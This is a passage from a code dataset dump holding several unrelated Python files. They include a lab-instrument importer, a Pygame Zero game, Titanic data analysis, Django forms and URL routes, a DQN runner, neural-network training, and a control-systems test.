the number of rows to jump and parse the next data line or return the code error -1\n \"\"\"\n # if there are less values founded than headers, it's an error\n if len(sline) != len(self._columns):\n self.err(\"One data line has the wrong number of items\")\n return -1\n rawdict = {}\n for idx, result in enumerate(sline):\n rawdict[self._columns[idx]] = result\n # Getting key values\n resid = rawdict['Sample ID']\n del rawdict['Sample ID']\n testname = rawdict['Test Name']\n del rawdict['Test Name']\n\n # Building the new dict\n rawdict['DefaultResult'] = 'Result'\n rawdict['Remarks'] = rawdict['Comments'].join(rawdict['Interpretation'])\n del rawdict['Comments']\n del rawdict['Interpretation']\n rawdict['DateTime'] = self.csvDate2BikaDate(rawdict['Load Date/Time'])\n self._addRawResult(resid, {testname: rawdict}, False)\n return 0\n\n def csvDate2BikaDate(self, DateTime):\n # example: 11/03/2014 14:46:46 --> %d/%m/%Y %H:%M %p\n Date, Time = DateTime.split(' ')\n dtobj = datetime.strptime(Date + ' ' + Time, \"%d/%m/%Y %H:%M:%S\")\n return dtobj.strftime(\"%Y%m%d %H:%M:%S\")\n\n\nclass BeckmancoulterAccessImporter(AnalysisResultsImporter):\n def __init__(self, parser, context, idsearchcriteria, override,\n allowed_ar_states=None, allowed_analysis_states=None,\n instrument_uid=None):\n AnalysisResultsImporter.__init__(self, parser, context,\n idsearchcriteria, override,\n allowed_ar_states,\n allowed_analysis_states,\n instrument_uid)\n","sub_path":"bika/lims/exportimport/instruments/beckmancoulter/access/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232902109","text":"import pgzrun\nimport random\n\nWIDTH = 1280\nHEIGHT = 960\nCENTRE = WIDTH/2, HEIGHT/2\nFONT_COLOUR = (255, 255, 255)\nSPEED = 2\nSPEEDBALOON = 8\n\nspieler = Actor(\"spieler\")\nspieler.pos = WIDTH/2, HEIGHT/2\nspieler_leben = 3\n\ngegnerId = random.randint(2, 3)\ngegner = Actor(\"spieler\" + str(gegnerId))\ngegner.pos = WIDTH/4, HEIGHT/4\ngegner_leben = 3\n\nspeed_gegner_x = 0\nspeed_gegner_y = 0\nwasserbombe_rot = Actor(\"wasserbombe_rot\")\nwasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n\nwasserbombe_rot2 = Actor(\"wasserbombe_rot\")\nwasserbombe_rot2.pos = gegner.pos[0]+20, gegner.pos[1]+10\n\nwurf = False\nwurf_gegner = False\nwurf_pos = spieler.pos\ndx = 0\ndy = 0\nspace_vorher = False\n\nneues_leben = Actor(\"herz3\")\nneues_leben_sichtbar = False\nx_neues_leben = -10\ny_neues_leben = -10\nneues_leben.pos = x_neues_leben, y_neues_leben\n\n# Das ist die Funktion zum Zeichnen\ndef draw():\n if spieler_leben > 0 and gegner_leben > 0:\n screen.fill((0, 0, 255))\n spieler.draw()\n gegner.draw()\n wasserbombe_rot.draw()\n wasserbombe_rot2.draw()\n screen.draw.text(\"Spieler\", color=FONT_COLOUR, topleft=(10, 10))\n x_herz = 10\n for l in range(1, spieler_leben+1):\n screen.blit('herz', (x_herz, 30))\n x_herz += 60\n screen.draw.text(\"Gegner\", color=FONT_COLOUR, topleft=(1100, 10))\n x_herz_gegner = 1100\n for l in range(1, gegner_leben+1):\n screen.blit('herz', (x_herz_gegner, 30))\n x_herz_gegner += 60\n if neues_leben_sichtbar:\n neues_leben.draw()\n elif gegner_leben <= 0:\n screen.fill((0, 255, 0))\n screen.draw.text(\"Du hast gewonnen!\", fontsize=60, center=(WIDTH/2, HEIGHT/2), color=FONT_COLOUR)\n screen.draw.text(\"Drücke ESC, um neu zu starten.\", center=(WIDTH/2, 4*HEIGHT/7), color=FONT_COLOUR)\n else:\n screen.fill((255, 0, 0))\n screen.draw.text(\"Du hast verloren!\", fontsize=60, center=(WIDTH/2, HEIGHT/2), color=FONT_COLOUR)\n screen.draw.text(\"Drücke ESC, um neu zu starten.\", center=(WIDTH/2, 4*HEIGHT/7), color=FONT_COLOUR)\n\n\ndef update():\n global wurf\n global wurf_gegner\n global dx\n global dy\n global spieler_leben\n global gegner_leben\n global space_vorher\n global neues_leben\n global neues_leben_sichtbar\n \n # Bewege Spieler \n if keyboard.left:\n spieler.x -= SPEED\n\n if keyboard.right:\n spieler.x += SPEED\n\n if keyboard.up:\n spieler.y -= SPEED\n\n if keyboard.down:\n spieler.y += SPEED\n\n if keyboard.ESCAPE:\n if (spieler_leben <= 0 or gegner_leben <= 0):\n spieler_leben = 3\n gegner_leben = 3\n spieler.pos = WIDTH/2, HEIGHT/2\n gegner.pos = WIDTH/4, HEIGHT/4\n wurf_gegner = False\n wurf = False\n\n # Bewege Gegner \n gegner.x += speed_gegner_x\n gegner.y += speed_gegner_y\n \n\n # Löse Wurf aus\n if keyboard.space and not space_vorher:\n wurf = True\n space_vorher = keyboard.space\n\n # Ermittle Flugrichtung, falls noch nicht geworfen wurde (Bewegungsrichtung Spieler)\n if wurf == False:\n if keyboard.left:\n dx = -SPEEDBALOON\n elif keyboard.right:\n dx = SPEEDBALOON\n else:\n dx = 0\n if keyboard.up:\n dy = -SPEEDBALOON\n elif keyboard.down:\n dy = SPEEDBALOON\n else:\n dy = 0\n # Platziere Wasserbombe neben Spieler\n wasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n else:\n # Bewege Wasserbombe\n wasserbombe_rot.pos = wasserbombe_rot.pos[0]+dx, wasserbombe_rot.pos[1]+dy\n if wasserbombe_rot.collidepoint(gegner.pos):\n gegner_leben -= 1\n wurf = False\n\n # Falls der Rand getroffen wird, setze die Wasserbombe zurück (Position neben Spieler)\n if wasserbombe_rot.pos[0] < 0 or wasserbombe_rot.pos[0] > WIDTH or wasserbombe_rot.pos[1] < 0 or wasserbombe_rot.pos[1] > HEIGHT or (dx == 0 and dy == 0):\n wasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n dx = 0\n dy = 0\n wurf = False\n\n # Wasserbombe Gegner\n if wurf_gegner == False:\n wasserbombe_rot2.pos = gegner.pos[0]+20, gegner.pos[1]+10\n else:\n if wasserbombe_rot2.collidepoint(spieler.pos):\n spieler_leben -= 1\n wurf_gegner = False\n\n if neues_leben_sichtbar == True and neues_leben.collidepoint(spieler.pos):\n neues_leben_sichtbar = False\n clock.schedule(erzeuge_herz, 3.0)\n if spieler_leben < 3:\n spieler_leben += 1\n \nif neues_leben_sichtbar == True and neues_leben.collidepoint(gegner.pos):\n neues_leben_sichtbar = False\n clock.schedule(erzeuge_herz, 3.0)\n if gegner_leben < 3:\n gegner_leben += 1\n \n# Berechne eine zufällige Bewegungsrichtung für den Gegner\ndef aendere_bewegungsrichtung_gegner():\n global speed_gegner_x\n global speed_gegner_y\n global gegner\n speed_gegner_x = random.randint(-SPEED, SPEED)\n speed_gegner_y = random.randint(-SPEED, SPEED)\n if((gegner.x < 100 and speed_gegner_x < 0) or (gegner.x>WIDTH-100 and speed_gegner_x > 0)):\n speed_gegner_x = -speed_gegner_x\n if((gegner.y < 100 and speed_gegner_y < 0) or (gegner.y>HEIGHT-100 and speed_gegner_y > 0)):\n speed_gegner_y = -speed_gegner_y\n clock.schedule(aendere_bewegungsrichtung_gegner, 1.0)\n\n\ndef ruecksetzen_wasserbombe_gegner():\n global wurf_gegner\n wurf_gegner = False\n \n\ndef werfe_wasserbombe_gegner():\n global wurf_gegner\n global wurf_pos\n dx = spieler.x - gegner.x\n dy = spieler.y - gegner.y\n wurf_pos = gegner.pos[0] + dx * 1.5, gegner.pos[1] + dy * 1.5\n wurf_gegner = True\n animate(wasserbombe_rot2, tween='linear', pos=wurf_pos, duration=1.2, on_finished=ruecksetzen_wasserbombe_gegner)\n clock.schedule(werfe_wasserbombe_gegner, 5.0)\n\n\ndef erzeuge_herz():\n global neues_leben\n global neues_leben_sichtbar\n neues_leben_sichtbar = True\n x_neues_leben = random.randint(0, WIDTH)\n y_neues_leben = random.randint(0, HEIGHT)\n neues_leben.pos = x_neues_leben, y_neues_leben\n \n\naendere_bewegungsrichtung_gegner()\nclock.schedule(werfe_wasserbombe_gegner, 5.0)\nclock.schedule(erzeuge_herz, 1.0)\n\npgzrun.go()\n","sub_path":"worldofwarriors/World of warriors.py","file_name":"World of warriors.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"193256632","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef show_statistics(x):\n # print(x.head())\n # print(x.describe())\n # print(x.info())\n # print(x.describe(include=['O']))\n\n # fill NaN for Age\n x.loc[x['Age'].isnull(), 'Age'] = x['Age'].mean()\n # x.loc[:, 'Age'] = x['Age'].fillna(x['Age'].mean())\n\n # 各年齡層的男女人數:圖形化\n fig = plt.figure(figsize=(15, 8))\n plt.hist([x[x['Sex'] == 'male']['Age'], x[x['Sex'] == 'female']['Age']], stacked=False, color=['g', 'r'], bins=30,\n label=['Male', 'Female'])\n plt.xlabel('Age')\n plt.ylabel('Number of Sex')\n plt.legend()\n\n # 以人數比例來看不同性別的存活率\n print(x[['Sex', 'Survived']].groupby(['Sex'], as_index=False).mean().sort_values(by='Survived', ascending=False))\n # 圖形化\n survived_sex = x[x['Survived'] == 1]['Sex'].value_counts()\n dead_sex = x[x['Survived'] == 0]['Sex'].value_counts()\n df = pd.DataFrame([survived_sex, dead_sex])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=True, figsize=(15, 8))\n\n # 以人數來看不同性別的存活率:圖形化\n total_sex = x['Sex'].value_counts()\n p_survived_sex = x[x['Survived'] == 1]['Sex'].value_counts() / total_sex\n p_dead_sex = x[x['Survived'] == 0]['Sex'].value_counts() / total_sex\n df = pd.DataFrame([p_survived_sex, p_dead_sex])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=True, figsize=(15, 8))\n\n # 統計姓名裡的稱謂總人數與其年齡的平均數\n for title in ['Mr.', 'Sir.', 'Dr.', 'Major.', 'Master.']:\n num = x[(x['Name'].str.contains(title))]['Name'].count()\n age = x[(x['Name'].str.contains(title))]['Age'].mean()\n print('{} – > {} males, Age average is {}'.format(title, num, age))\n print('-----------------------')\n for title in ['Ms.', 'Miss.', 'Mrs.', 'Lady.']:\n num = x[(x['Name'].str.contains(title))]['Name'].count()\n age = x[(x['Name'].str.contains(title))]['Age'].mean()\n print('{} – > {} females, Age average is {}'.format(title, num, age))\n print('=======================')\n\n # 統計某稱謂的總人數、存活人數、死亡人數、存活率\n for title in ['Mr.', 'Sir.', 'Dr.', 'Major.', 'Master.']:\n num_survived = x[(x['Survived'] == 1) & (x['Name'].str.contains(title))]['Name'].count()\n num_died = x[(x['Survived'] == 0) & (x['Name'].str.contains(title))]['Name'].count()\n print('{} total:{} – > {} survived, {} died. {:.3f}% survived'.format(title, num_survived + num_died,\n num_survived,\n num_died, (100 * num_survived / (\n num_survived + num_died))))\n print('-----------------------')\n for title in ['Ms.', 'Miss.', 'Mrs.', 'Lady.']:\n num_survived = x[(x['Survived'] == 1) & (x['Name'].str.contains(title))]['Name'].count()\n num_died = x[(x['Survived'] == 0) & (x['Name'].str.contains(title))]['Name'].count()\n print('{} total:{} – > {} survived, {} died. {:.3f}% survived'.format(title, num_survived + num_died,\n num_survived,\n num_died, (100 * num_survived / (\n num_survived + num_died))))\n print('=======================')\n\n # 從人數來看不同船票等級的存活率:圖形化\n survived_pclass = x[x['Survived'] == 1]['Pclass'].value_counts()\n dead_pclass = x[x['Survived'] == 0]['Pclass'].value_counts()\n df = pd.DataFrame([survived_pclass, dead_pclass])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # 從人數比例來看不同船票等級的存活率\n print(x[['Pclass', 'Survived']].groupby(['Pclass'], as_index=False).mean().sort_values(by='Survived',\n ascending=False))\n print('=======================')\n\n # 不同船票等級與性別對於存活率的影響\n print(x[['Pclass', 'Sex', 'Survived']].groupby(['Pclass', 'Sex'], as_index=False).mean().sort_values(\n by='Survived', ascending=False))\n print('=======================')\n\n # 不同船票等級與性別對於存活率的影響:圖形化(女性)\n total_female_p1 = x[(x['Pclass'] == 1) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p1 = x[(x['Pclass'] == 1) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p1\n total_female_p2 = x[(x['Pclass'] == 2) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p2 = x[(x['Pclass'] == 2) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p2\n total_female_p3 = x[(x['Pclass'] == 3) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p3 = x[(x['Pclass'] == 3) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p3\n df = pd.DataFrame([female_p1[[0, 1]], female_p2[[0, 1]], female_p3[[0, 1]]])\n df.index = ['Female in P1', 'Female in P2', 'Female in P3']\n df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # 不同年齡層的存亡人數:圖形化\n plt.figure(figsize=(15, 8))\n plt.hist([x[x['Survived'] == 1]['Age'], x[x['Survived'] == 0]['Age']], stacked=True, color=['g', 'r'], bins=30,\n label=['Survived', 'Dead'])\n plt.xlabel('Age')\n plt.ylabel('Number of passengers')\n plt.legend()\n\n # 親屬人數對存活率的影響\n x_with_family = x.copy()\n x_with_family['Family'] = x['SibSp'] + x['Parch']\n print(x_with_family[['Family', 'Survived']].groupby(['Family'], as_index=False).mean().sort_values(\n by='Survived', ascending=False))\n # print('=======================')\n\n # 上岸港口對存活率的影��\n x[['Embarked', 'Survived']].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False)\n # print('=======================')\n\n # 上岸港口對存活率的影響:圖形化\n total_Embarked_S = x[x['Embarked'] == 'S']['Survived'].count()\n total_Embarked_C = x[x['Embarked'] == 'C']['Survived'].count()\n total_Embarked_Q = x[x['Embarked'] == 'Q']['Survived'].count()\n Embarked_S = x[x['Embarked'] == 'S']['Survived'].value_counts() / total_Embarked_S\n Embarked_C = x[x['Embarked'] == 'C']['Survived'].value_counts() / total_Embarked_C\n Embarked_Q = x[x['Embarked'] == 'Q']['Survived'].value_counts() / total_Embarked_Q\n df = pd.DataFrame([Embarked_S, Embarked_C, Embarked_Q])\n df.index = ['Southampton', 'Cherbourg', 'Queenstown']\n # df.plot(kind='bar', stacked = False, figsize = (15, 8))\n\n # 上岸港口與船票等級的關係\n total_Pclass_S = x[x['Embarked'] == 'S']['Pclass'].count()\n total_Pclass_C = x[x['Embarked'] == 'C']['Pclass'].count()\n total_Pclass_Q = x[x['Embarked'] == 'Q']['Pclass'].count()\n Embarked_S = x[x['Embarked'] == 'S']['Pclass'].value_counts() / total_Pclass_S\n Embarked_C = x[x['Embarked'] == 'C']['Pclass'].value_counts() / total_Pclass_C\n Embarked_Q = x[x['Embarked'] == 'Q']['Pclass'].value_counts() / total_Pclass_Q\n df = pd.DataFrame([Embarked_S, Embarked_C, Embarked_Q])\n df.index = ['Southampton', 'Cherbourg', 'Queenstown']\n # df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # plt.show()\n\n\n# used for MLP\ndef show_train_history(train_history, train_acc, validation_acc, ylabel):\n plt.plot(train_history.history[train_acc])\n plt.plot(train_history.history[validation_acc])\n epoch_num = len(train_history.epoch)\n final_epoch_train_acc = train_history.history[train_acc][epoch_num - 1]\n final_epoch_validation_acc = train_history.history[validation_acc][epoch_num - 1]\n plt.text(epoch_num, final_epoch_train_acc, 'train = {:.3f}'.format(final_epoch_train_acc))\n plt.text(epoch_num, final_epoch_validation_acc-0.01, 'valid = {:.3f}'.format(final_epoch_validation_acc))\n plt.title('Train History')\n plt.ylabel(ylabel)\n plt.xlabel('Epoch')\n plt.xlim(xmax=epoch_num+1)\n plt.legend(['train', 'validation'], loc='upper left')\n fig = plt.gcf()\n fig.savefig('./mlp_train_{}.png'.format(ylabel), dpi=100)\n plt.clf()\n # plt.show()\n return final_epoch_train_acc, final_epoch_validation_acc\n","sub_path":"common/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":8447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"395152134","text":"import re\nfrom django import forms\nfrom django.core.exceptions import ValidationError\nfrom bootstrap3_crispy.bootstrap import StrictButton, FormActions\nfrom bootstrap3_crispy import layout as crispy\nfrom bootstrap3_crispy.helper import FormHelper\nfrom casexml.apps.case.xml import V1, V2\n\n\nclass EmailForm(forms.Form):\n email_subject = forms.CharField(max_length=100)\n email_body = forms.CharField()\n real_email = forms.BooleanField(required=False)\n\nclass BrokenBuildsForm(forms.Form):\n builds = forms.CharField(\n widget=forms.Textarea(attrs={'rows': '30', 'cols': '50'})\n )\n\n def clean_builds(self):\n self.build_ids = re.findall(r'[\\w-]+', self.cleaned_data['builds'])\n if not self.build_ids:\n raise ValidationError(\"You must provide a \")\n return self.cleaned_data['builds']\n\n\nclass PrimeRestoreCacheForm(forms.Form):\n check_cache_only = forms.BooleanField(\n label='Check cache only',\n help_text=\"Just check the cache, don't actually generate the restore response.\",\n required=False\n )\n domain = forms.CharField(\n label='Domain',\n required=True\n )\n version = forms.ChoiceField(\n label='Output version',\n choices=((V1, V1), (V2, V2)),\n initial=V2\n )\n cache_timeout = forms.IntegerField(\n label='Cache timeout (hours)',\n min_value=1,\n max_value=48,\n initial=24\n )\n overwrite_cache = forms.BooleanField(\n label='Overwrite existing cache',\n help_text=('This will ignore any existing cache and '\n 're-calculate the restore response for each user'),\n required=False\n )\n all_users = forms.BooleanField(\n label='Include all users in the domain',\n required=False\n )\n users = forms.CharField(\n label='User list',\n help_text=('One username or user_id per line '\n '(username must be full username e.g. test@domain.commcarehq.org)'),\n widget=forms.Textarea(attrs={'rows': '5', 'cols': '50'}),\n required=False\n )\n\n def __init__(self, *args, **kwargs):\n super(PrimeRestoreCacheForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.form_method = 'post'\n self.helper.form_action = '.'\n self.helper.layout = crispy.Layout(\n crispy.Field('check_cache_only', data_ng_model='check_cache_only'),\n crispy.Div(\n 'version',\n 'cache_timeout',\n 'overwrite_cache',\n data_ng_hide='check_cache_only'\n ),\n crispy.Field('all_users', data_ng_model='all_users'),\n 'domain',\n crispy.Div('users', data_ng_hide='all_users'),\n FormActions(\n StrictButton(\n \"Submit\",\n css_class=\"btn-primary\",\n type=\"submit\",\n ),\n ),\n )\n\n def clean_users(self):\n user_ids = self.cleaned_data['users'].splitlines()\n self.user_ids = filter(None, user_ids)\n return self.cleaned_data['users']\n\n def clean(self):\n cleaned_data = super(PrimeRestoreCacheForm, self).clean()\n if not self.user_ids and not cleaned_data['all_users']:\n raise forms.ValidationError(\"Please supply user IDs or select the 'All Users' option\")\n\n if cleaned_data['all_users'] and not cleaned_data['domain']:\n raise forms.ValidationError(\"Please supply a domain to select users from.\")\n return cleaned_data\n","sub_path":"corehq/apps/hqadmin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"259044573","text":"'''\n234. Palindrome Linked List\nGiven a singly linked list, determine if it is a palindrome.\n\nFollow up:\nCould you do it in O(n) time and O(1) space?\n'''\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n slow = fast = head\n \n while fast and fast.next is not None: \n fast = fast.next.next\n slow = slow.next\n \n node = None \n \n # reverse second half\n while slow: \n nxt = slow.next\n slow.next = node \n node = slow\n slow = nxt\n \n # compare first half to second\n while node: \n if node.val != head.val : \n return False \n node = node.next\n head = head.next \n return True","sub_path":"234_palindrome_linked_list.py","file_name":"234_palindrome_linked_list.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142070892","text":"import argparse\nfrom unityagents import UnityEnvironment\nimport numpy as np\nfrom src.dqn import DQN\nimport matplotlib.pyplot as plt\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--train\", help=\"Whether to train or load weights from file\",\n action='store_const', const=True, default=False)\n parsed_args = parser.parse_args()\n train = parsed_args.train\n\n env = UnityEnvironment(file_name=\"Banana.app\")\n dqn = DQN(env, solve_threshold=15.0)\n\n weights_filename = \"final_weights.pth\"\n\n if train:\n scores = dqn.train()\n dqn.store_weights(weights_filename)\n plot_scores(scores)\n else:\n dqn.run_with_stored_weights(weights_filename)\n\n\ndef plot_scores(scores):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n plt.plot(np.arange(len(scores)), scores)\n plt.ylabel('Score')\n plt.xlabel('Episode #')\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595969357","text":"from L2.functions import *\nimport random\n\ndef main():\n am_labels = 10\n X_tr, Y_tr, y_tr = readfile(\"../Datasets/data_batch_1\")\n X_tr1, Y_tr1, y_tr1 = readfile(\"../Datasets/data_batch_2\")\n X_tr2, Y_tr2, y_tr2 = readfile(\"../Datasets/data_batch_3\")\n X_tr3, Y_tr3, y_tr3 = readfile(\"../Datasets/data_batch_4\")\n X_tr4, Y_tr4, y_tr4 = readfile(\"../Datasets/data_batch_5\")\n\n X_tr = np.concatenate((X_tr, X_tr1), axis=1)\n X_tr = np.concatenate((X_tr, X_tr2), axis=1)\n X_tr = np.concatenate((X_tr, X_tr3), axis=1)\n X_tr = np.concatenate((X_tr, X_tr4[:, :9000]), axis=1)\n\n Y_tr = np.concatenate((Y_tr, Y_tr1), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr2), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr3), axis=1)\n Y_tr = np.concatenate((Y_tr, Y_tr4[:, :9000]), axis=1)\n\n y_tr = np.concatenate((y_tr, y_tr1), axis=0)\n y_tr = np.concatenate((y_tr, y_tr2), axis=0)\n y_tr = np.concatenate((y_tr, y_tr3), axis=0)\n y_tr = np.concatenate((y_tr, y_tr4[:9000]), axis=0)\n\n X_val = X_tr4[:, 9000:10000]\n Y_val = Y_tr4[:, 9000:10000]\n y_val = y_tr4[9000:10000]\n\n #X_val, Y_val, y_val = readfile(\"../Datasets/data_batch_2\")\n\n X_test, Y_test, y_test = readfile(\"../Datasets/test_batch\")\n\n LOAD = True\n\n mean_x = np.mean(X_tr, axis=1)\n\n mean_x = np.reshape(mean_x, (-1, 1))\n\n X_tr -= mean_x\n X_val -= mean_x\n X_test -= mean_x\n\n am_nodes = [50] # number of nodes for the hidden layers\n\n dim_img = len(X_val)\n\n W, b = get_parameters(dim_img, am_labels, am_nodes, 1337)\n\n# P, H = evaluate_classifier(X_tr[:, 0:100], W, b)\n#\n# djdb, djdw = compute_gradients(X_tr[:, 0:100], Y_tr[:, 0:100], P, H, W, 0.001)\n#\n# if LOAD:\n# djdb2 = load_mats(\"djdb2\", \"mats\")\n# djdw2 = load_mats(\"djdw2\", \"mats\")\n# else:\n# djdb2, djdw2 = compute_grads_num_slow(X_tr[:, 0:100], Y_tr[:, 0:100], W, b, 0.001, 0.00001)\n# save_mats(djdb2, \"djdb2\", \"mats\")\n# save_mats(djdw2, \"djdw2\", \"mats\")\n#\n# for lay in range(len(am_nodes) + 1):\n# print(\"lay: \" + str(lay))\n# diff_b = djdb[lay] - djdb2[lay]\n# diff_w = djdw[lay] - djdw2[lay]\n#\n#\n# bsum = np.sum(np.abs(diff_b)) / b[lay].size\n# wsum = np.sum(np.abs(diff_w)) / W[lay].size\n#\n# print(\"bsum: \", bsum)\n# print(\"wsum: \", wsum)\n#\n#\n# acc_before_train = compute_accuracy(X_test, y_test, W, b)\n# print(\"Accuracy before training: \", acc_before_train)\n#\n# n_batch = 100\n# n_epochs = 20\n# rho = 0.9\n# dr = 0.95 # decay rate\n#\n# eta_lower = 0.0055\n# eta_upper = 0.008\n#\n# lamb_lower = 0.0045\n# lamb_upper = 0.006\n#\n# pairing_tries = 100\n#\n# results = np.zeros((pairing_tries, 3))\n#\n# for t in range(pairing_tries):\n#\n# eta = random.uniform(eta_lower, eta_upper)\n# lamb = random.uniform(lamb_lower, lamb_upper)\n#\n# Wstar, bstar = mini_batch_GD(X_tr, X_val, Y_tr, Y_val, n_batch, eta, n_epochs, W, b, lamb, rho, dr)\n#\n# acc = compute_accuracy(X_test, y_test, Wstar, bstar)\n#\n# print(\"pair: \" + str(t) + \" acc: \" + str(acc), \" eta: \" + str(eta) + \" lamb: \" + str(lamb))\n#\n# results[t, :] = [acc, eta, lamb]\n#\n# # Sort results based on descending accuracy\n# results = results[results[:, 0].argsort()[::-1]]\n#\n# np.savetxt(\"results.txt\", results, fmt=\"%1.5f\")\n#\n\n\n n_batch = 100\n n_epochs = 30\n rho = 0.9\n dr = 0.95 # decay rate\n #eta = 0.0056\n #lamb = 0.00541\n eta = 0.00614\n lamb = 0.00590\n\n\n Wstar, bstar = mini_batch_GD(X_tr, X_val, Y_tr, Y_val, n_batch, eta, n_epochs, W, b, lamb, rho, dr)\n\n acc = compute_accuracy(X_test, y_test, Wstar, bstar)\n\n print(\"Accuracy after training: \", acc)\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"L2/l2_main.py","file_name":"l2_main.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"464360117","text":"from django.contrib import admin\nfrom django.urls import path\n\nfrom apps.test_security.views import (\n proxy_view, hide_request_body_view, log_exempt_view, throttling_exempt_view, extra_throttling_view\n)\n\nadmin.autodiscover()\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('proxy/', proxy_view),\n path('hide-request-body/', hide_request_body_view),\n path('log-exempt/', log_exempt_view),\n path('throttling-exempt/', throttling_exempt_view),\n path('extra-throttling/', extra_throttling_view),\n]\n","sub_path":"example/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140432808","text":"from control import *\nfrom control.matlab import *\nimport matplotlib.pyplot as plt \nimport numpy as np\nfrom datetime import datetime\n\nzeta = 0.707\nw0 = 1\nts = 0.1\n\nt1 = datetime.now()\ng = tf(w0*w0, [1,2*zeta,w0*w0])\ngz = c2d(g,ts)\n\ncoeffs = tfdata(gz)\n\nco = {\n 'a1':coeffs[1][0][0][1],\n 'a2':coeffs[1][0][0][2],\n 'b1':coeffs[0][0][0][0],\n 'b2':coeffs[0][0][0][1],\n 'dt':gz.dt\n}\n\ntheta_k_2 = 0.8\ntheta_k_1 = 0.78\n\nu_k_2 = 0.9\nu_k_1 = 0.8\n\ntheta_k = co['a1'] * theta_k_1 + co['a2'] * theta_k_2 + co['b1'] * u_k_1 + co['b2'] * u_k_2\n\nprint(gz)\nprint(co)\nprint(theta_k)\n\nt2 = datetime.now()\nprint(t2-t1)\n\nt = np.arange(0, 16, 0.1)\ny,t1 = step(gz,t)\nplt.step(t,y)\nplt.grid()\nplt.xlabel('t') \nplt.ylabel('y')\nplt.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"592525898","text":"import xml.etree.ElementTree as ET\nimport os\n\n# 这里是因为 python 涉及 xsl 和 xml 的联合转换的 module:libxml2 已经找不到了\n# 因此选择用这个解析,但是也写好了 对应的 xsl 文件: web/static/scenic.xsl\n# xml file is web/static/scenic.xml\n\n# 遍历xml文件\n\ndicts = {}\ndicts['names'] = []\ndicts['address'] = []\n\ndef __traverseXml(element):\n if len(element) > 0:\n for child in element:\n if child.tag == 'name':\n dicts['names'].append(child.text)\n # print('name: ', child.text)\n elif child.tag == 'address':\n dicts['address'].append(child.text)\n # print(child.text)\n __traverseXml(child)\n\ndef __mergeDicts():\n newDict = {}\n if len(dicts['names']) == 0 or len(dicts['address']) == 0:\n return newDict\n\n if len(dicts['names']) > len(dicts['address']):\n dicts['names'] = dicts['names'][0:len(dicts['address'])]\n elif len(dicts['names']) < len(dicts['address']):\n dicts['address'] = dicts['address'][0:len(dicts['names'])]\n\n # print(len(dicts['names']), ' ', len(dicts['address']))\n\n newDict = dict(zip(dicts['names'], dicts['address']))\n # print(newDict)\n\n return newDict\n\n# return the dict\ndef getDict():\n xmlFilePath = \"/static/scenic.xml\"\n tree = ET.parse(xmlFilePath)\n\n # 获得根节点\n root = tree.getroot()\n\n # 遍历xml文件\n __traverseXml(root)\n newDict = __mergeDicts()\n return newDict\n\n# Delete the list when it's done\ndef clearDict():\n clearli(dicts['names'])\n clearli(dicts['address'])\n\ndef clearli(li):\n if len(li) != 0:\n del li[:]","sub_path":"web/xmlAnalysis.py","file_name":"xmlAnalysis.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"555828702","text":"from server import db\n\n\nclass Operation(object):\n \"\"\"\n 操作驱动模块\n \"\"\"\n\n @staticmethod\n def execute(name=\"user\", controler=None):\n \"\"\"装饰事件\n :params name : 可选参数,如果不想默认使用相同方法!可指定方法\n :params control : 可选参数, 传递项要的事件控制器\n \"\"\"\n def control(func):\n result = lambda x: getattr(OperationDefault if not controler 